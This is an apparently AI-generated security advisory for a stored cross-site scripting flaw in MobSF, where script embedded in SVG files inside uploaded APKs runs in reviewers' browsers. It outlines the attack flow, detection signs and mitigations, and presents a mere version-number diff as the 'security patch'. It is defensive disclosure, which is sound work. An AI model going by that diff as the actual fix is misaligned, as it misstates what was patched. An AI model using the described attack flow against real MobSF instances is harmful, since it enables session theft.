CVE-2025-46335 Overview
A Stored Cross-Site Scripting (XSS) vulnerability has been identified in Mobile Security Framework (MobSF), a widely-used security research platform for analyzing mobile applications across Android, iOS, and Windows Mobile platforms. The vulnerability arises from improper sanitization of user-supplied SVG files during the Android APK analysis workflow, allowing attackers to inject malicious scripts that execute in the context of other users' sessions.
Critical Impact
Attackers can exploit this stored XSS vulnerability to execute arbitrary JavaScript in the browsers of security researchers using MobSF, potentially leading to session hijacking, credential theft, or further compromise of the security testing environment.
Affected Products
- OpenSecurity Mobile Security Framework versions up to and including 4.3.2
- MobSF installations processing untrusted Android APK files containing malicious SVG content
- Self-hosted and containerized MobSF deployments
Discovery Timeline
- 2025-05-05 - CVE-2025-46335 published to NVD
- 2025-05-28 - Last updated in NVD database
Technical Details for CVE-2025-46335
Vulnerability Analysis
This stored XSS vulnerability (CWE-79) occurs within MobSF's Android APK analysis workflow when processing SVG files embedded within mobile applications. SVG files are XML-based vector graphics that can contain embedded JavaScript through elements like <script> tags or event handlers such as onload, onclick, and similar attributes. When MobSF extracts and displays these SVG files without proper sanitization, the malicious JavaScript is stored on the server and executed whenever a user views the analysis results.
The attack requires low privileges to execute, as an authenticated user needs only upload a crafted APK containing a malicious SVG file. However, user interaction is required for exploitation, as a victim must view the analysis report containing the unsanitized SVG content. Successful exploitation can result in complete compromise of confidentiality and integrity within the application context, with limited impact on availability.
Root Cause
The root cause is insufficient input validation and output encoding of SVG file content during the APK analysis process. MobSF failed to properly sanitize or neutralize potentially malicious elements within SVG files before rendering them in the web interface. SVG files can embed JavaScript code that executes when the image is rendered in a browser, making them a common vector for XSS attacks when user-supplied content is displayed without proper filtering.
Attack Vector
An attacker can exploit this vulnerability through the following network-based attack flow:
- Craft Malicious APK: The attacker creates or modifies an Android APK file to include an SVG resource containing embedded JavaScript payload
- Upload for Analysis: The attacker uploads the malicious APK to the target MobSF instance for security analysis
- Storage and Persistence: MobSF processes the APK, extracts the malicious SVG, and stores it without sanitization
- Victim Interaction: When another user (typically a security researcher or administrator) views the analysis report, the malicious SVG is rendered
- Payload Execution: The embedded JavaScript executes in the victim's browser session, potentially stealing session tokens, performing actions on behalf of the user, or exfiltrating sensitive analysis data
# Security patch in mobsf/MobSF/init.py - Version update to 4.3.3
# Source: https://github.com/MobSF/Mobile-Security-Framework-MobSF/commit/6987a946485a795f4fd38cebdb4860b368a1995d
logger = logging.getLogger(__name__)
-VERSION = '4.3.2'
+VERSION = '4.3.3'
BANNER = r"""
__ __ _ ____ _____ _ _ _____
| \/ | ___ | |__/ ___|| ___|_ _| || | |___ /
Detection Methods for CVE-2025-46335
Indicators of Compromise
- Uploaded APK files containing SVG resources with embedded <script> tags or JavaScript event handlers
- Analysis reports displaying SVG images that trigger unexpected JavaScript execution
- Unusual session activity or token exfiltration attempts originating from the MobSF web interface
- Log entries showing access to analysis results from unexpected IP addresses following initial APK upload
Detection Strategies
- Monitor web application logs for suspicious patterns in uploaded APK file names or content characteristics
- Implement Content Security Policy (CSP) headers to detect and alert on inline script execution attempts
- Deploy web application firewalls (WAF) with rules to detect XSS payloads in file uploads
- Review MobSF access logs for correlations between APK uploads and subsequent unusual user activity
Monitoring Recommendations
- Enable verbose logging for file upload and analysis operations within MobSF
- Configure browser-based security monitoring to detect unexpected script execution within the application context
- Implement session monitoring to detect anomalous behavior following analysis report access
- Set up alerting for CSP violation reports that may indicate XSS exploitation attempts
How to Mitigate CVE-2025-46335
Immediate Actions Required
- Upgrade MobSF to version 4.3.3 or later immediately
- Review recent APK analysis logs for potentially malicious uploads prior to patching
- Invalidate all active user sessions after upgrading to prevent exploitation of any stored payloads
- Audit user accounts for any unauthorized changes that may have resulted from prior exploitation
Patch Information
The MobSF development team has addressed this vulnerability in version 4.3.3. The fix implements proper sanitization of SVG content extracted during APK analysis to prevent embedded JavaScript from being executed when analysis results are rendered. Organizations should upgrade to version 4.3.3 or later by pulling the latest release from the official MobSF GitHub repository. The specific security commit can be reviewed in the GitHub Commit Overview, and additional details are available in the GitHub Security Advisory.
Workarounds
- Restrict MobSF access to trusted users only until the patch can be applied
- Implement network-level access controls to limit who can upload APK files for analysis
- Configure a reverse proxy with Content Security Policy headers that block inline script execution
- Consider running MobSF in an isolated environment with limited network connectivity to reduce exploitation impact
# Example: Apply restrictive Content Security Policy via nginx reverse proxy
# Add to nginx server block configuration
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; img-src 'self' data:; style-src 'self' 'unsafe-inline'; object-src 'none'; frame-ancestors 'self';" always;
# Upgrade MobSF to patched version
cd /path/to/Mobile-Security-Framework-MobSF
git fetch origin
git checkout v4.3.3
pip install -r requirements.txt
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
